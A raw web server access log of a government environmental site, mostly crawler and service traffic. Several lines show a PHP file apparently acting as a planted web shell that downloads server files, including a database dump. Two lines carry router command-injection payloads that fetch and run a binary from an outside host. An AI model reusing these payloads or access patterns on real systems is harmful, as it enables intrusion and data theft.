47.128.99.84 - - [28/Jun/2024:05:28:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0799.pdf&ft=download&white=1 HTTP/1.1" 200 425639
181.58.62.22 - - [28/Jun/2024:05:28:24 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2020%2F HTTP/1.1" 200 333353
47.128.118.212 - - [28/Jun/2024:05:28:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cautodeclaracion-22%5C&f=bannerdeclaracionmod.jpg&ft=download HTTP/1.1" 200 88233
172.22.2.4 - - [28/Jun/2024:05:28:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
66.249.66.12 - - [28/Jun/2024:05:28:41 -0500] "GET /isolucionsda/Arriba.asp?Pagina=/isolucionsda/bancoconocimiento/N/NTC4983/NTC4983.asp&IdArticulo=7166 HTTP/1.1" 200 527
66.249.66.11 - - [28/Jun/2024:05:28:41 -0500] "GET /BLA/resoluciones/AUTOS%202023/2347.pdf HTTP/1.1" 304 -
47.128.124.164 - - [28/Jun/2024:05:28:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=StringType.int.php&ft=download&white=1 HTTP/1.1" 200 2153
47.128.118.232 - - [28/Jun/2024:05:29:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=export.lib.php&ft=download HTTP/1.1" 200 25281
201.245.192.253 - - [28/Jun/2024:05:29:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.55.218 - - [28/Jun/2024:05:29:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=relation.lib.php&ft=download HTTP/1.1" 200 55186
201.245.192.253 - - [28/Jun/2024:05:29:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Jun/2024:05:29:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35197
47.128.55.249 - - [28/Jun/2024:05:29:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=1817.pdf&ft=download&white=1 HTTP/1.1" 200 20135
47.128.55.49 - - [28/Jun/2024:05:29:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Message.class.php&ft=download&white=1 HTTP/1.1" 200 18915
216.245.221.92 - - [28/Jun/2024:05:29:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:05:30:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.30.7 - - [28/Jun/2024:05:30:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2201.pdf&ft=download&white=1 HTTP/1.1" 200 708263
201.245.192.253 - - [28/Jun/2024:05:30:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35520
47.128.55.41 - - [28/Jun/2024:05:30:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=5734.pdf&ft=download HTTP/1.1" 200 388775
47.128.96.243 - - [28/Jun/2024:05:30:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Error.class.php&ft=download HTTP/1.1" 200 10460
47.128.96.250 - - [28/Jun/2024:05:30:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csuelos%5Cimages&f=pdf.png&ft=download HTTP/1.1" 200 1002
201.245.192.253 - - [28/Jun/2024:05:31:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.57.226 - - [28/Jun/2024:05:31:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5Cdmz%5C&f=mercury_start.bat&ft=download&white=1 HTTP/1.1" 200 136
201.245.192.253 - - [28/Jun/2024:05:31:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.96.55 - - [28/Jun/2024:05:31:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5CDesktop&f=ambientebogota.sql&ft=download HTTP/1.1" 200 164885
47.128.97.182 - - [28/Jun/2024:05:31:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=StringCType.class.php&ft=download HTTP/1.1" 200 2828
172.22.2.4 - - [28/Jun/2024:05:30:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
199.16.157.183 - - [28/Jun/2024:05:31:55 -0500] "GET /images/pl%C3%A1sticos%20foto%201..jpg HTTP/1.1" 404 1034
201.245.192.253 - - [28/Jun/2024:05:32:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [28/Jun/2024:05:32:26 -0500] "GET /autoliquidacion/Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/1-%20INSTRUCTIVO%20SOLICITUD%20VERIFICACI%C3%93N%20PARA%20EXPEDICI%C3%93N%20SUNL.pdf HTTP/1.1" 200 953394
172.22.2.4 - - [28/Jun/2024:05:30:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
172.22.2.4 - - [28/Jun/2024:05:32:48 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%20011%20del%2005%20de%20julio%20de%202017.pdf HTTP/1.1" 200 965526
201.245.192.253 - - [28/Jun/2024:05:32:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [28/Jun/2024:05:33:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
191.95.55.190 - - [28/Jun/2024:05:33:07 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 404 1038
201.245.192.253 - - [28/Jun/2024:05:33:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [28/Jun/2024:05:33:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3584.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:05:34:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [28/Jun/2024:05:34:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:05:35:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:35:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Jun/2024:05:35:40 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [28/Jun/2024:05:35:41 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [28/Jun/2024:05:35:41 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [28/Jun/2024:05:35:41 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [28/Jun/2024:05:35:41 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [28/Jun/2024:05:35:41 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [28/Jun/2024:05:35:42 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [28/Jun/2024:05:35:42 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [28/Jun/2024:05:35:42 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [28/Jun/2024:05:35:42 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [28/Jun/2024:05:35:42 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
201.245.192.253 - - [28/Jun/2024:05:36:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [28/Jun/2024:05:37:01 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [28/Jun/2024:05:37:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:37:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36682
201.245.192.253 - - [28/Jun/2024:05:37:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35520
201.245.192.253 - - [28/Jun/2024:05:37:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
157.55.39.49 - - [28/Jun/2024:05:37:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/4303.pdf HTTP/1.1" 200 410813
172.22.2.4 - - [28/Jun/2024:05:35:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:05:37:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [28/Jun/2024:05:38:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/05462.pdf HTTP/1.1" 200 482503
201.245.192.253 - - [28/Jun/2024:05:38:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:05:38:17 -0500] "GET /autoliquidacion/Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/5-%20SOLICITUD%20VERIFICACI%C3%93N%20IMPORTACI%C3%93N%20EXPORTACION%20FLORA.xlsx HTTP/1.1" 200 36514
172.22.2.4 - - [28/Jun/2024:05:36:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [28/Jun/2024:05:39:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:39:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Jun/2024:05:39:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35197
216.245.221.92 - - [28/Jun/2024:05:39:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:05:40:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:40:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35520
66.249.66.12 - - [28/Jun/2024:05:40:50 -0500] "GET /autoliquidacion/Solicitudes%20relacionadas%20con%20ocupaci%C3%B3n%20de%20cauce/126pm04-pr36-f-1%20solicitud%20de%20permiso%20de%20ocupacion%20de%20cauce%20y%20lista%20de%20chequeo%20V08.xls HTTP/1.1" 200 726528
201.245.192.253 - - [28/Jun/2024:05:41:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:41:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Jun/2024:05:41:50 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20T-299%20DE%202008.doc HTTP/1.1" 200 40960
66.249.66.12 - - [28/Jun/2024:05:41:51 -0500] "GET /autoliquidacion/Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/7-%20CONSOLIDADO%20DE%20MOVIMIENTOS,%20EXISTENCIAS%20Y%20RELACI%C3%93N%20DE%20DOCUMENTOS.xlsx HTTP/1.1" 200 33067
201.245.192.253 - - [28/Jun/2024:05:42:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.20 - - [28/Jun/2024:05:42:18 -0500] "GET /BLA/resoluciones/AUTOS%202013/0664.pdf HTTP/1.1" 200 1189826
201.245.192.253 - - [28/Jun/2024:05:42:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [28/Jun/2024:05:43:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
44.227.38.253 - - [28/Jun/2024:05:43:17 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.49 - - [28/Jun/2024:05:43:17 -0500] "GET /BLA/resoluciones/AUTOS%202022/1824.pdf HTTP/1.1" 200 429729
201.245.192.253 - - [28/Jun/2024:05:43:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Jun/2024:05:41:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.12 - - [28/Jun/2024:05:43:51 -0500] "GET /BLA/resoluciones/AUTOS%202023/05919.pdf HTTP/1.1" 200 941933
66.249.66.13 - - [28/Jun/2024:05:43:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0953.pdf HTTP/1.1" 200 2355215
201.245.192.253 - - [28/Jun/2024:05:44:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [28/Jun/2024:05:42:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
17.241.219.45 - - [28/Jun/2024:05:44:24 -0500] "GET /tinguas-azules-secretaria-de-ambiente-atiende-alto-numero-de-reportes-de-aves-migratorias.html HTTP/1.1" 200 923
216.245.221.92 - - [28/Jun/2024:05:44:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:05:45:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:45:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [28/Jun/2024:05:45:23 -0500] "GET /Publicaciones/2023EE241953.pdf HTTP/1.1" 404 228
66.249.66.13 - - [28/Jun/2024:05:45:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4698.pdf HTTP/1.1" 200 353750
66.249.66.11 - - [28/Jun/2024:05:45:24 -0500] "GET /Publicaciones/2024EE87133.pdf HTTP/1.1" 404 227
201.245.192.253 - - [28/Jun/2024:05:46:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:47:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:47:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [28/Jun/2024:05:47:25 -0500] "GET /autoliquidacion/index.php?dir=Solicitudes%20relacionadas%20con%20ocupaci%F3n%20de%20cauce/&sort=name&order=asc HTTP/1.1" 200 2870
201.245.192.253 - - [28/Jun/2024:05:47:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [28/Jun/2024:05:48:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
141.98.83.197 - - [28/Jun/2024:05:48:58 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [28/Jun/2024:05:48:58 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
201.245.192.253 - - [28/Jun/2024:05:49:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.49.60 - - [28/Jun/2024:05:49:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3075.pdf&ft=download HTTP/1.1" 200 409255
172.22.2.4 - - [28/Jun/2024:05:47:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:05:49:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.46.63 - - [28/Jun/2024:05:49:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=server_status_queries.lib.php&ft=download HTTP/1.1" 200 4875
66.249.66.13 - - [28/Jun/2024:05:49:25 -0500] "GET /BLA/boletinlegal/Directivas/2009/Directiva%20No.%20del%2023%20de%20Diciembre%20de%202009.pdf HTTP/1.1" 200 1636862
66.249.66.12 - - [28/Jun/2024:05:49:26 -0500] "GET /autoliquidacion/index.php?dir=Solicitudes%20relacionadas%20con%20ocupaci%F3n%20de%20cauce/&sort=size&order=desc HTTP/1.1" 200 2869
172.22.2.4 - - [28/Jun/2024:05:49:32 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 304 -
47.128.54.159 - - [28/Jun/2024:05:49:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=String.class.php&ft=download HTTP/1.1" 200 6866
172.22.2.4 - - [28/Jun/2024:05:49:46 -0500] "GET /BLA/boletinlegal/logincheck HTTP/1.1" 404 1018
216.245.221.92 - - [28/Jun/2024:05:49:53 -0500] "HEAD / HTTP/1.1" 200 -
47.128.19.81 - - [28/Jun/2024:05:49:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=themes.php&ft=download&white=1 HTTP/1.1" 200 863
201.245.192.253 - - [28/Jun/2024:05:50:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [28/Jun/2024:05:48:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
47.128.118.24 - - [28/Jun/2024:05:50:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=pmd_common.php&ft=download&white=1 HTTP/1.1" 200 8406
47.128.44.92 - - [28/Jun/2024:05:50:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Header.class.php&ft=download HTTP/1.1" 200 22968
47.128.120.92 - - [28/Jun/2024:05:50:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=6613.pdf&ft=download HTTP/1.1" 200 183975
47.128.45.141 - - [28/Jun/2024:05:50:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CSIIPEV%5CDiseno+de+Elementos+de+Mobiliario+Urbano%5COtros+Elementos&f=Compromiso_Ciudadano2.png&ft=download HTTP/1.1" 200 19827
201.245.192.253 - - [28/Jun/2024:05:51:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.123.255 - - [28/Jun/2024:05:51:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=Scripts.class.php&ft=download HTTP/1.1" 200 7020
40.77.167.55 - - [28/Jun/2024:05:51:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/01472.pdf HTTP/1.1" 200 764403
201.245.192.253 - - [28/Jun/2024:05:51:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [28/Jun/2024:05:51:26 -0500] "GET /autoliquidacion/Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/Aplicativo.html HTTP/1.1" 200 359
47.128.44.86 - - [28/Jun/2024:05:51:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5292.pdf&ft=download&white=1 HTTP/1.1" 200 20135
201.245.192.253 - - [28/Jun/2024:05:52:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [28/Jun/2024:05:52:26 -0500] "GET /autoliquidacion/Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/6-%20SOLICITUD%20DE%20REGISTRO%20DEL%20LIBRO%20OPERACIONES.xlsx HTTP/1.1" 200 31826
17.241.219.151 - - [28/Jun/2024:05:52:35 -0500] "GET /presentamos-las-nuevas-herramientas-de-la-secretaria-de-ambiente-para-analizar-y-monitorear-los-rios-de-bogota.html HTTP/1.1" 200 905
201.245.192.253 - - [28/Jun/2024:05:52:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [28/Jun/2024:05:53:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:53:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.48 - - [28/Jun/2024:05:53:43 -0500] "GET /BLA/resoluciones/AUTOS%202014/3345.pdf HTTP/1.1" 200 377955
201.245.192.253 - - [28/Jun/2024:05:54:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:05:54:27 -0500] "GET /autoliquidacion/Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/3-%20INSTRUCTIVO%20REGISTRO%20DE%20NUEVOS%20USUARIOS%20EN%20LA%20PLATAFORMA%20VITAL.pdf HTTP/1.1" 200 644720
52.167.144.203 - - [28/Jun/2024:05:54:49 -0500] "GET /Publicaciones/2024EE125014.pdf HTTP/1.1" 404 228
216.245.221.92 - - [28/Jun/2024:05:54:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Jun/2024:05:53:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:05:55:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:55:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Jun/2024:05:54:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
201.245.192.253 - - [28/Jun/2024:05:56:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:57:06 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:57:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Jun/2024:05:57:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [28/Jun/2024:05:58:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [28/Jun/2024:05:58:43 -0500] "GET /BLA/boletinlegal/Directivas/2009/Directiva%20No.%20del%2023%20de%20Diciembre%20de%202009.pdf HTTP/1.1" 200 1636862
47.128.110.105 - - [28/Jun/2024:05:58:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4648.pdf&ft=download HTTP/1.1" 200 417447
201.245.192.253 - - [28/Jun/2024:05:59:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.123.251 - - [28/Jun/2024:05:59:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=5485.pdf&ft=download HTTP/1.1" 200 97958
201.245.192.253 - - [28/Jun/2024:05:59:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.44.185 - - [28/Jun/2024:05:59:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=postbox.min.js&ft=download&white=1 HTTP/1.1" 200 3514
66.249.66.11 - - [28/Jun/2024:05:59:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201451-1500/20021462.tif HTTP/1.1" 200 240322
66.249.66.11 - - [28/Jun/2024:05:59:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20101-150/2002RES148.tif HTTP/1.1" 200 245072
66.249.66.11 - - [28/Jun/2024:05:59:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20551-600/00000558.tif HTTP/1.1" 200 309090
47.128.40.52 - - [28/Jun/2024:05:59:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=1188.pdf&ft=download HTTP/1.1" 200 491175
216.245.221.92 - - [28/Jun/2024:05:59:53 -0500] "HEAD / HTTP/1.1" 200 -
